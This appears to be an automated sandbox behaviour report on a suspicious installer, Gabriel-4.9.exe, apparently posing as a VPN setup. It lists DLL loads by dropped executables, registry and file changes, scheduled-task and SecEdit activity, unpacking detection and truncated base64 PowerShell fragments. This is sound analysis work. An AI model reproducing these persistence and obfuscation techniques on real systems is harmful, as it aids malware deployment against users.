Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: ntmarta.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: profapi.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: urlmon.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: iertutil.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: srvcli.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: wininet.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: taskschd.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: xmllite.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: napinsp.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: wshbth.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: nlaapi.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: winrnr.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: devenum.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: winmm.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: devobj.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: msasn1.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: msdmo.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: avicap32.dll
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: msvfw32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: scecli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: gpapi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: wldp.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: profapi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: propsys.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: twext.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: appresolver.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: bcp47langs.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: slc.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: userenv.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: sppc.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: policymanager.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: msvcp110_win.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: ntshrui.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: cscapi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: twinapi.appcore.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: textshaping.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: starttiledata.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: acppage.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: sfc.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: msi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: aepic.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: sfc_os.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: edputil.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: netutils.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: mpr.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: ndfapi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: wdi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: duser.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: xmllite.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: atlthunk.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: textinputframework.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: coreuicomponents.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: wininet.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: taskschd.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: scecli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: scecli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: scecli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll

Source: C:\Users\user\Desktop\Gabriel-4.9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File written: C:\inst.ini

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Directory created: C:\Program Files\product1\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Directory created: C:\Program Files\product1\letsvpn-latest.exe			Jump to behavior

Source: Gabriel-4.9.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: Gabriel-4.9.exe

Static file information: File size 21068715 > 1048576

Source: Gabriel-4.9.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb source: MTGHu7b.exe, 00000012.00000003.2432557024.0000000000D30000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000003.2580730778.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb% source: MTGHu7b.exe, 00000012.00000003.2432557024.0000000000D30000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000003.2580730778.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmp

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\ProgramData\Program\iusb3mon.exe

Unpacked PE file: 30.2.iusb3mon.exe.6290000.3.unpack

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9AD

